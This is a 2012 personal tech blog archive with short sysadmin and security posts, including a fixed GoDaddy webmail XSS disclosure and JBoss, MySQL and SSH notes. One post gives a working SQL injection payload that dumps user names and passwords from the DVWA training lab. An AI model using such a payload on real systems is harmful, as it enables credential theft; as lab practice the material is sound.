Sunday, September 23, 2012

login.secureserver.net (GoDaddy webmail) XSS - fixed

A few weeks back, I notified Godaddy.com support about an XSS vulnerability on their webmail login page, login.secureserver.net. Turns out secureserver.net wasn't as secure as they had hoped it would be. The underlying problem was that they were allowing arbitrary parameters to be passed without sanitizing the input. They've since fixed it to HTML escape the characters in the params.

To give credit where credit is due, I found out not long ago that http://xss.cx found the bug a few days before I did and did a better job at reporting it. They also found more bugs around this time last year.

http://xss.cx/2012/08/08/ghdb/xss-cross-site-scripting-cwe79-capec86-javascript-injection-rest-url-parameter-example-poc-report-godaddycom.html

And before that...

http://xss.cx/2011/09/16/ghdb/dork-xss-reflected-cross-site-scripting-cwe79-capec86-javascript-injection-insecure-configuration-weak-programming-http-cookie-without-secure-flag-set-injection-example-poc-report-01.html#2.12

Screenshots of my POC bugs below. Pity that I couldn't get it to work on a WebKit-based browser ; (



Tuesday, August 7, 2012

What happened when I deleted standalone/tmp/vfs/

So I was trying to clear up some disk space on one of our Liferay servers and deleted the temporary deployment files under /apps/liferay/jboss-7.0.2/standalone/tmp/vfs/. After I rm -rf'ed the crap out of that directory and started the server back up I saw that it did not want to start. Great, it's the end of the day and I've just downed a box. YAY.

boot.log spits out:

20:14:24,985 ERROR [stderr] Exception in thread "Controller Boot Thread" java.lang.RuntimeException: org.jboss.as.controller.persistence.ConfigurationPersistenceException: Failed to parse configuration
20:14:24,985 ERROR [stderr] at org.jboss.as.controller.AbstractControllerService$1.run(AbstractControllerService.java:89)
20:14:24,986 ERROR [stderr] at java.lang.Thread.run(Thread.java:722)
20:14:24,987 ERROR [stderr] Caused by: org.jboss.as.controller.persistence.ConfigurationPersistenceException: Failed to parse configuration
20:14:24,987 ERROR [stderr] at org.jboss.as.controller.persistence.XmlConfigurationPersister.load(XmlConfigurationPersister.java:115)
20:14:24,987 ERROR [stderr] at org.jboss.as.controller.AbstractControllerService.boot(AbstractControllerService.java:104)
20:14:24,988 ERROR [stderr] at org.jboss.as.server.ServerService.boot(ServerService.java:195)
20:14:24,988 ERROR [stderr] at org.jboss.as.controller.AbstractControllerService$1.run(AbstractControllerService.java:83)
20:14:24,989 ERROR [stderr] ... 1 more
20:14:24,990 ERROR [stderr] Caused by: com.ctc.wstx.exc.WstxEOFException: Unexpected EOF in prolog
20:14:24,990 ERROR [stderr]  at [row,col {unknown-source}]: [1,0]
20:14:24,991 ERROR [stderr] at com.ctc.wstx.sr.StreamScanner.throwUnexpectedEOF(StreamScanner.java:677)
20:14:24,991 ERROR [stderr] at com.ctc.wstx.sr.BasicStreamReader.handleEOF(BasicStreamReader.java:2104)
20:14:24,991 ERROR [stderr] at com.ctc.wstx.sr.BasicStreamReader.nextFromProlog(BasicStreamReader.java:2010)
20:14:24,992 ERROR [stderr] at com.ctc.wstx.sr.BasicStreamReader.next(BasicStreamReader.java:1102)
20:14:25,003 ERROR [stderr] at com.ctc.wstx.sr.BasicStreamReader.nextTag(BasicStreamReader.java:1125)
20:14:25,003 ERROR [stderr] at org.jboss.staxmapper.XMLMapperImpl.parseDocument(XMLMapperImpl.java:57)
20:14:25,004 ERROR [stderr] at org.jboss.as.controller.persistence.XmlConfigurationPersister.load(XmlConfigurationPersister.java:107)
20:14:25,004 ERROR [stderr] ... 4 more

Since the first line is complaining about the configuration, I figured I'd take a look at standalone.xml. Wait a sec, why is it blank? Mystery solved.

Copied the latest backup config back to it's rightful location and started it up.

cp /apps/liferay/jboss-7.0.2/standalone/configuration/standalone_xml_history/<year-month-date-timestamp>/standalone.last.xml /apps/liferay/jboss-7.0.2/standalone/configuration/standalone.xml 

Success. If I can consistently reproduce this, it may be worthwhile to file a bug report.

Monday, August 6, 2012

MySQL command-line utilities on OSX

I was looking for mysql command-line utilities on my mac and couldn't seem to find them. Admittedly, I wasn't looking all that thoroughly. I had previously installed mysql-workbench from here - http://www.mysql.com/downloads/workbench/. I like the gui and everything, but it's nice to know what commands you're running when you do an export, import, show databases, etc. 

Anyway, if you're looking for the command-line utilities, cd here:

/Applications/MySQLWorkbench.app/Contents/Resources/

To help avoid repetitive stress and be more effecient (lazy), I created a couple aliases.

alias mysql='/Applications/MySQLWorkbench.app/Contents/Resources/mysql'
alias mysqldump='/Applications/MySQLWorkbench.app/Contents/Resources/mysqldump'

Hope this helps.

Sunday, July 22, 2012

HTML 5 guitar tuner

I got tired of trying to use the gieson tuner since it's changed sounds over time. Also, wanted to do a little mini project involving HTML5. Check it out.



Wednesday, July 18, 2012

Brooklyn Tech XSS vulnerability

Well Brooklyn Tech, you've been given you ample notification and time to fix this.


Tuesday, May 29, 2012

Make me president...and I won't even tell them I'm jewish

Man, I loved this song as a kid. Still do at times, though the main theme of the song doesn't really apply to me as much anymore. Punk rock before the term was ever coined.


Sunday, May 20, 2012

Enable/Disable OS X screen lock via shell

I'm sure that I ripped this off from somewhere, but can't seem to recall from where. Apologies to whomever's work I've used but not credited.


#!/bin/sh


osascript -e 'tell application "System Events"
tell security preferences
set properties to {require password to wake:true} # true = on, false = off
end tell
end tell'

Thursday, May 10, 2012

I'm pretty sure I didn't eat the spoon

A few weeks ago, I woke up in middle of the night, went to the fridge and ate a yogurt. When I awoke, I saw the empty container, but the spoon I used was gone. For a while there, I was worried that I somehow ate the spoon in my sleepeating daze. 

After some time, I realized that I'd be in some serious pain or just plain choking if I ate a friggin spoon.

However, this woman did.

Saturday, March 17, 2012

ERROR 2002 (HY000): Can't connect to local MySQL server through socket

root@localhost# mysql -u root
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)

Sunday, February 26, 2012

Wednesday, February 22, 2012

How to: set up a Web Application Firewall


This document should serve as a guide for configuring a Web Application Firewall running Apache, mod_proxy and mod_security. I've written this down mainly as a reminder for myself, but if it helps someone out there working on this task, then great.

Tuesday, February 21, 2012

DVWA - SQL Injection: Medium, solved.

On the low setting, the following works to extract the data from first_name and password columns.

a' UNION ALL SELECT first_name, password from dvwa.users;#'

Thanks to hackyea.com

Monday, January 30, 2012

iTerm crash


iTerm decided to stop working for me today. Every time I tried launching a new terminal it would crash out, giving me a crash reporter window stating: "iTerm quit unexpectedly. Click Reopen to open the application again...":

python easy_install on Mac OS X Lion

easy_install seems broken on Mac OS X Lion, as of 10.7.2. From what I've seen on the web, it's not just me.

While calling the easy_install script in /usr/bin fails, running the script under /Library/Python/…. works fine.

Sunday, January 29, 2012

How to: create an ssh tunnel

To create an ssh tunnel, this is the basic syntax:

ssh -L 5555:localhost:5900  remoteuser@remotehost.example.org

Where:

Monday, January 2, 2012

Python - TestZoneTransfer

Here's a python script to help find world-transferable DNS domains within your organization. Alternatively, you could search through your .conf files for ACL weaknesses/misconfigurations, but that can become quite cumbersome when dealing with large datasets.